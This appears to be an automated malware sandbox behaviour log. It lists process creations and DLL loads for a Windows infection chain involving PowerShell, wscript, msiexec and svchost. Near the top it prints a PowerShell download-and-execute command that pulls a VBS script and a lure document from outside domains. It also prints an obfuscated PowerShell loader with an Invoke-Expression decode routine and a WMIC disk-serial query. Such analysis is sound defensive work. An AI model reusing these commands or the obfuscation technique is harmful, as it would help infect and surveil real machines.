                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\rdc7di6ccs.docx" /o ""
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chrEA6C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/df460fc7/4a1b3c1a"
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2544 --field-trial-handle=2512,i,3131430340746137316,18275235593028859389,262144 /prefetch:8
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmprph.exe "C:\Program Files\Windows Media Player\wmprph.exe"
                        Source: C:\Program Files\Windows Media Player\wmprph.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx'Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\g8ix97hz.vbs" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Public\rdc7di6ccs.docx" /o ""Jump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumberJump to behavior
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Blodudtrdningen='Afhndede';;$noncooperator='Cryophorus';;$Thalassinian='Josephina';;$Maste193='Forslvendes';;$Downthrust=$host.Name; function Symboltabeller($blowtube){If ($Downthrust) {$Morphogenic='Ukammerater';$overstegne=2;$Smugleriernes=$overstegne}do{$Usaglige+=$blowtube[$Smugleriernes];$Smugleriernes+=3} until(!$blowtube[$Smugleriernes])$Usaglige}function cleavingly($Ethnicon){ .($Gudmors) ($Ethnicon)}$Medioanterior=Symboltabeller 'ben EExtTw.F W';$Medioanterior+=Symboltabeller 'ReeUnbLacb,lO,i keBrn FT';$Forstdelsernes=Symboltabeller 'RyM Ro Dz.riOpl,alDeaAm/';$Udlodning=Symboltabeller 'P T.klBls F1Se2';$Rival='N [,in Be STTr.FjSasE MRGivmoISaCNeE MPBeO CIBoNAnTTiME a lnEdApaGDoEcor,l] : D: Ss eMoc u KrS i TtSaYFoPB.R SO t po BCKlO,rlF =Vu$ US DDuld Oped eN,eI dNNiG';$Forstdelsernes+=Symboltabeller 'Mo5S .No0Mo t(TiWImi.on Pd oAvwDosO. lyNChTF. p1 e0Me.Af0K,;Ap CoWT iMinSn6 4F ; Unx,a6 u4Ac; l FarGrvGa:.e1ab3U 1In.S 0 F)La LoGU,e KcHokIno l/.u2Sh0 e1Un0Ha0me1 f0Sa1 i KeFIdi ArGre rf Jo nx L/T 1,a3Ac1Ca. ,0';$Hoejkulturer=Symboltabeller ' DUansGnEB RTi- AUdg ,E oN .t';$Eliksirers=Symboltabeller '.oh pt tc,pAnsPl:fe/Ni/ChwInw hwD . atUndSkeSij .bDe.Chc ho Am ./Exew fSk/ STokPriSlf tP eP r nn xeT .ScsChe ea E>Unh FtD,t Np she:Fl/.l/,iw SwBew .O a,krGeeMrcseo ksA aFolaud GaGatAnu SrMie,e.Spi Kt ./ SeEnfPf/ RS.ekEtiInfSutMeeH.r,anAmeAd.V sAne Ia';$Programmeringsskik1=Symboltabeller 'A >';$Gudmors=Symboltabeller ' BIC eH x';$Strudsmaven='Circumscript';$Fastprissystemet='\Even.Lar';cleavingly (Symboltabeller '.a$EsGA.LEpOArbLaaKaL e: ai GoVeD fi Sn .ETrs B=A,$StEBrNU vAp:EmaB pMaPMedC a TT aGu+S $ FE,ABes TSepSirFoiges.es,uYTis.mT teO mS.EK,t');cleavingly (Symboltabeller ' C$anG oLKvOHaBRoa LKv:SpVK A .aPabLoeReNBoFRuATeBDeR AiStKDy=Pr$ rESolazI dKT,S kISkRUnE .R FSCh.SaSnePPrLOpiTetRa( a$AnPSyr rOUbGVirFuaViM.aMSkeFor ei oND.G WSM sR kPriHekTe1 ,)');cleavingly (Symboltabeller $Rival);$Eliksirers=$Vaabenfabrik[0];$portor=(Symboltabeller 'Re$PrG,tLNeoW,BS.AP lF,:.aAFrTDiENol I ,e kR .v eiDeN FdWhUmeER = aNU eNyWIn- koTrbStj,yEBrcMiTDe BesRyy oS.ttr.eA mKa. i$ Bm leLyd SIRaoUlApenA.T eeDir itho r');cleavingly ($portor);cleavingly (Symboltabeller 'S $.iaVitBaeMilMiitoeWirInvEgiUnnTidDuuPae e. HS eS a dpreScr ,s S[Wu$VrHRuo,pe jH,kscu ul ktHyuenrU eD r e].r=An$PlFP oBirPasAdtKad.be ElBisA eNerL nTeeFus');$Pastina=Symboltabeller 'Ve$Sea etT,e ll oi,oeMirRuvKaiMin TdOpu aeSk. fD Uo wOpn Cl,ioDeaL d KF,ei el SeD (Bo$SaEFel li,ikNas Ei nr DeCorBesbe,In$ SBotFieM.mFin Pi bnDdg osH.fApu PlLedObtOt)';$Stemningsfuldt=$Iodines;cleavingly (Symboltabeller 'Sm$ AGK.lAnOC,bG.A.rl u:AfW IeMoe ukMdeChN eD HUS DseFAal,ru gRetUnEHar Tn fe IS t= E(erTC E SUnTp -Alp rAO,TFohC Vi$,rS nTKie SM Bn aIUnnEggFis.oFwaur LAfd T.a)');while (!$Weekendudflugternes) {cleavingly (Symboltabeller ' G$GegHelB,o ,b a KlAn:TrF,no DeJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chrEA6C.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/df460fc7/4a1b3c1a"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmprph.exe "C:\Program Files\Windows Media Player\wmprph.exe"
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2544 --field-trial-handle=2512,i,3131430340746137316,18275235593028859389,262144 /prefetch:8
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                        Source: C:\Program Files\Windows Media Player\wmprph.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mlang.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: fwpolicyiomgr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
